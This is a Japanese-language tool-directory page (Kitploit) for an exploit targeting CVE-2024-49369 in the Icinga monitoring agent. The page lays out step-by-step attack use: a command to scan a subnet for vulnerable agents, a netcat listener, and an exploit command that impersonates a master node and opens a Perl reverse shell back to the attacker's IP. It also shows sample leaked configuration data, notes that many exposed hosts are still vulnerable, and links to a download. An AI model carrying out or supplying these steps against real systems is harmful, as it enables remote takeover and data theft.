Skip to content
KitploitKITPLOIT
ツールブログ
Log in
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2024-49369 — CVE-2024-49369(Icinga)向けのエクスプロイトツール。サブネットスキャン、JSON-RPC偽装によるエージェント乗っ取り、任意コマンド実行、リバースシェルを可能にします。 | Kitploit
ツール/GitHubGitHub/quantum-sicarius/cve-2024-49369
エクスプロイト情報収集ネットワークセキュリティペネトレーションテストコマンド&コントロールリモートアクセスツール
GitHubquantum-sicarius/cve-2024-49369

CVE-2024-49369

CVE-2024-49369(Icinga)向けのエクスプロイトツール。サブネットスキャン、JSON-RPC偽装によるエージェント乗っ取り、任意コマンド実行、リバースシェルを可能にします。

リポジトリを見る
2191年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2024-49369

概要

この脆弱性は、Icinga JSON-RPCプロトコルを利用して、Icingaエージェントを実行する監視対象ノードを悪用します。Master/Satelliteインスタンスになりすますことで、攻撃者はエージェントを乗っ取り、任意のコマンドを実行したり、機密情報を取得したりする可能性があります。


使用方法

スキャン

脆弱なエージェントをサブネット内でスキャンするには、次のコマンドを実行します。

python3 main.py scan --subnet 192.168.0.0/24 --vuln --batch 25

指定されたサブネットを25 IP単位のバッチでスキャンします。このツールはJSON-RPCプロトコルを介してIcinga::HELLOメッセージを送信し、応答するエージェントとそのバージョンを特定します。


エクスプロイト

エンドポイントで設定とコマンド実行が有効になっている場合(Icingaエージェントを使用する監視対象ノードのデフォルト設定)、攻撃者は以下のことが可能です。

  1. Master/Satelliteインスタンスになりすます。
  2. エンドポイントの設定を更新する。
  3. エンドポイント上で任意のコマンドを実行する。

これにより、システム全体が侵害される可能性があります(サービスユーザーに依存)が、アクセスが制限される場合もあります。

前提条件

  • ネットワークの中断またはターゲットの再起動:Icingaエージェントは、既存の接続が切断されるまで、同じMaster/Satelliteインスタンスからの新しい接続を自動的に拒否します。

親ノードがまだ接続されている場合、エクスプロイト接続はログに次のように表示されます。

[2024-12-11 09:13:03 -0500] information/ApiListener: New client connection for identity 'my_satellite' from [::ffff:192.168.0.1]:48120
[2024-12-11 09:13:04 -0500] information/ApiListener: New client connection for identity 'my_satellite' from [::ffff:192.168.0.1]:48124 (certificate validation failed: code 18: self signed certificate)
[2024-12-11 09:13:04 -0500] warning/ApiListener: No data received on new API connection from [::ffff:192.168.0.1]:48124 for identity 'my_satellite'. Ensure that the remote endpoints are properly configured in a cluster setup.

クラスタに関する警告がトリガーされているため、このノードが攻撃に対して脆弱であることがわかります。つまり、現在のサテライトはまだ接続されていますが、このエージェントは私たちを有効な親と見なしています。

手順

  1. リバースシェル用のNetcatリスナーを起動します。

    nc -lvnp 9001
    
  2. エクスプロイトを実行します。

    python3 main.py exploit --host 192.168.0.5 --node-cn icinga_master --zone master --revip 192.168.0.1 --revport 9001
    
    • --host:ターゲットエージェントのIPアドレス。
    • --node-cn:なりすますMaster/Satelliteのコモンネーム。
    • --zone:ターゲットゾーン名。デフォルトはmaster。
    • --revip:リバースシェル用の攻撃者のIPアドレス。
    • --revport:リバースシェル用の攻撃者のポート。

このコマンドは接続試行を繰り返します。ターゲットエージェントが現在の親から切断されると、ツールが引き継ぎ、チェックを送受信します。

ペイロード例

Perlベースのリバースシェルが、ツールによって作成された新しいチェックの一部として使用されます。


情報漏洩

ターゲットで設定とコマンド実行が無効になっていても、攻撃者はエージェントに送信されたチェックの結果を観察することで、機密データを入手できる可能性があります。

応答データ例

{
  "jsonrpc": "2.0",
  "method": "config::UpdateObject",
  "params": {
    "config": "object Downtime ...",
    "name": "icinga-agent!load!9856e6b2...",
    "type": "Downtime",
    "version": 1733899523.67197
  }
}
{
  "jsonrpc": "2.0",
  "method": "event::SetLastCheckStarted",
  "params": {
    "host": "icinga-agent",
    "last_check_started": 1733899492.313578,
    "service": "icinga"
  },
  "ts": 1733899492.313714
}

これらの応答には、機密性の高い設定、スケジュールデータ、さらには監視サービスの結果が含まれる可能性があります。


影響

Censys上では現在、公開されているIcingaポートを持つホストが24,003あります。スポットチェックの結果、ほとんどのホストが依然として脆弱なバージョンのIcingaを実行していることが示されています。


クレジット

この研究は、Icingaのブログで議論された研究に基づいています。


注意事項

  • このツールは常に責任を持って、許可されたセキュリティテストの範囲内で使用してください。
  • 脆弱性の悪用は深刻な結果を招く可能性があります。使用前に法的許可を確認してください。
ツールをダウンロード